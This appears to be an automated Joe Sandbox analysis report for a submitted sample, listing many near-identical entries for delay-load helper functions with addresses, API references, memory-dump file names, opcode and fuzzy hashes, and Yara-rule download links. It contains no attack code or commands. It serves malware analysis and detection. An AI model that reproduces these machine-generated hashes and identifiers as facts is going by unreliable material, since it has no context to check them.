Opcode Fuzzy Hash: 99ae9129ec5b1ccdeffe8d718154ee148fb74c4e84c283d5f14ef4537e07f157
Instruction Fuzzy Hash: AFB012E126C3057C31087318FC02D36035CE4C2B14330862BB50DD13C1D8406C085433

Function 008DD8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb9a783c28bff9613e730574aeea01fcda009a305b1a40afb4bdb543461291b1
Instruction ID: d82251e53ab4e5c9d1549a098df2f2ee8969e87f1d368b9117315c389aabe20f
Opcode Fuzzy Hash: bb9a783c28bff9613e730574aeea01fcda009a305b1a40afb4bdb543461291b1
Instruction Fuzzy Hash: B8B012E126C3057C31487318FC02D36035CE4C1B14330472BB10DD13C1D8406C485433

Function 008DD8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 51f4788ed7a415f8fa457d6880fb1d94b29f45b43be90cd7fad85ce42919d873
Instruction ID: a1d9348f341981539cd6634fd4a94eae6c27e86cb7af1f284b6b1e6d1e695b14
Opcode Fuzzy Hash: 51f4788ed7a415f8fa457d6880fb1d94b29f45b43be90cd7fad85ce42919d873
Instruction Fuzzy Hash: 57B012E126C3057C310C7319FC02D36035CF4C1B14330462BB10DD13C1D8406C085433

Function 008DD8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3fdb10816badbcc71c2733497fa880cc1dc6816df538f1e3fcdfa3eb8fe8e6a1
Instruction ID: 6f149fa968b84402d1ae9d2f97aef1dea5b04910db296a9dd8ae5f2e23f270fd
Opcode Fuzzy Hash: 3fdb10816badbcc71c2733497fa880cc1dc6816df538f1e3fcdfa3eb8fe8e6a1
Instruction Fuzzy Hash: 3BB012E126C3057C310C7318FD03D36035CE4C1B14330462BB10DD13C1D8406D095433

Function 008DD906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7c2095606a0193d112aa87218e2951160dc34469143437d89a8d402c3bd32690
Instruction ID: 1c4f99fd9c2b44d3741b40d979806c3c85774dc2b5a928d9a61aa47030e752c2
Opcode Fuzzy Hash: 7c2095606a0193d112aa87218e2951160dc34469143437d89a8d402c3bd32690
Instruction Fuzzy Hash: 44B012D126D3057C31087318FC02D36035DE4C1B14330862BB509D13C1D8406C441433

Function 008DD910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0cea79df1bdd5f1ae44cc238a4f3a982b6ab86c6ff1ccbe5f8dde8f9c704fb51
Instruction ID: 76edfa68928ff5cfa2aa99874b993c0c631377d41ca4badf010b1280b5630717
Opcode Fuzzy Hash: 0cea79df1bdd5f1ae44cc238a4f3a982b6ab86c6ff1ccbe5f8dde8f9c704fb51
Instruction Fuzzy Hash: 8AB012E126D3057C31487318FC02D36035DE4C0B14330472BB109D13C1D8406C441433

Function 008DD92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b7d1c8a9f80ae4521bbbe8739b7a6157d536b12df6550312e3b8de59e3e366a4
Instruction ID: fd82b930a0485060df7a4708af5515aed893989f7a29915473db2a26c221d1eb
Opcode Fuzzy Hash: b7d1c8a9f80ae4521bbbe8739b7a6157d536b12df6550312e3b8de59e3e366a4
Instruction Fuzzy Hash: 21B012D126C3157C31097328FC02D36039CE4C1B18330872BB609D13C1D9406C041533

Function 008DD924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 42c9d36ca0804097031e87cf22581d5a1d4e5258465fc9f2c3ac3a49701ae6c0
Instruction ID: b0736937092135969cea8cbdd19b67c19088a0f338f77db6093b3827a6b602c4
Opcode Fuzzy Hash: 42c9d36ca0804097031e87cf22581d5a1d4e5258465fc9f2c3ac3a49701ae6c0
Instruction Fuzzy Hash: 60B012D167D3057C31087318FC02D36039DF8C0B14330462BB109D13C1D8406C041433

Function 008DD942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55747d226366a4166b17ac1290330eba895db90fd10cd95f03035d5b55fb5d4b
Instruction ID: 9a30f57cc148a0c522479ab87e886a165ffc65eb2327dc53ddf11a500d52112e
Opcode Fuzzy Hash: 55747d226366a4166b17ac1290330eba895db90fd10cd95f03035d5b55fb5d4b
Instruction Fuzzy Hash: B7B092A126C2156C21096218A902D360398E480B18320462BB109D1281D8406C051532

Function 008DDACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 72b27ea854cc4a7ecefdd4719190919552790ac876a988cd147e6fa115c15a5f
Instruction ID: 9090ce4970218a3361dfb8e383da22e4ce5240d41af582ac6034abf114fd6d1d
Opcode Fuzzy Hash: 72b27ea854cc4a7ecefdd4719190919552790ac876a988cd147e6fa115c15a5f
Instruction Fuzzy Hash: A7B012A12AC316BC3118731AFC02D3A039CE1C0B10330C31BB409C0348D8484C088433

Function 008DDAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4a3c6ebd9c74d55352649561fb6a1ac2100a2375951148d2c1ac2c3988639c4b
Instruction ID: 9d565c5b7ccedf017f19f1554db36e5ebe6047b5e45fc73bc22bdb2154231c48
Opcode Fuzzy Hash: 4a3c6ebd9c74d55352649561fb6a1ac2100a2375951148d2c1ac2c3988639c4b
Instruction Fuzzy Hash: 5AB012912AC3167C3118731AFC02F3E039CF0C4B10330C71BB109C0348D8444C094433

Function 008DDBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDBD5

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1ff7860f84aaa9c67b8456c78af4937a91daae71ecb9008004f299e81778e3fe
Instruction ID: c89aac164ef5e49dd931fd7af0b7f42641953115ded14a8bf6eb03affdc2d5ef
Opcode Fuzzy Hash: 1ff7860f84aaa9c67b8456c78af4937a91daae71ecb9008004f299e81778e3fe
Instruction Fuzzy Hash: 1BB092992A930ABC22082229AC06C360328E080B24320462BB105D024499404C494032

Function 008DDBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDBD5

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cf786dd750dce01c80498bf09e17f33ffa78bce907097a2629d68484e6b7b3c7
Instruction ID: 0d6c4df3d3aa300016d0694a6a590b9beaeb0158950c02293c42dfb4854629f9
Opcode Fuzzy Hash: cf786dd750dce01c80498bf09e17f33ffa78bce907097a2629d68484e6b7b3c7
Instruction Fuzzy Hash: 8AB092992AC209AC21086229A806E360368F080B24320462BB11AC024499404C094032

Function 008DDBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDBD5

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9bced2dade52d086f404c8db238da09963ad06aeb99f49df563dad7a0d6b7fae
Instruction ID: 62cee6b0bde657e33c3410b1a2b3c4c1be60a4b6daf440aa59b1f05b102cc384
Opcode Fuzzy Hash: 9bced2dade52d086f404c8db238da09963ad06aeb99f49df563dad7a0d6b7fae
Instruction Fuzzy Hash: 1CB092992AA20AAC21086229A8069360368E180B24320861BB509C1248D9404C094032

Function 008DDBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDBD5

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2ac87fde7d4e53b09eb1d3ee99de6d70190dd455389ca9d2c48fb8581ee6c7fd
Instruction ID: 6a9f42792c86c549d9e64dcd703a7fdab4c3e9ffc715dfaa2294eaad3e9fd349
Opcode Fuzzy Hash: 2ac87fde7d4e53b09eb1d3ee99de6d70190dd455389ca9d2c48fb8581ee6c7fd
Instruction Fuzzy Hash: D5B092992A920AAC21086229A9069360368E080B24320861BB209C024499404C0A4032

Function 008DDB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0e2b75cadb5c2484919fb424e4b15233f91314a7041180cfbda40b478740dbd7
Instruction ID: 5ea4573b173d9af4ec2760a3b34cf7cd8068bfccb0a8f365adfe53f909228685
Opcode Fuzzy Hash: 0e2b75cadb5c2484919fb424e4b15233f91314a7041180cfbda40b478740dbd7
Instruction Fuzzy Hash: 71B012912EC31A7C3118731AFC02E3A039CF0C0B10330832BB009C0348D8444C044533

Function 008DDC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDC36

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d8de5e34645a7137a2fde8a1e5c50d7c95c399e361f059947c71001e3ea1a2e4
Instruction ID: b815345808aa28e0f29a6f4f28451ca770855bcd92708492a3ee3fe7fe857263
Opcode Fuzzy Hash: d8de5e34645a7137a2fde8a1e5c50d7c95c399e361f059947c71001e3ea1a2e4
Instruction Fuzzy Hash: 0BB012952BC309BC310C2354FE02C36033DE2C0B10330471BB205E0341AA806C485032

Function 008DDC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDC36

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
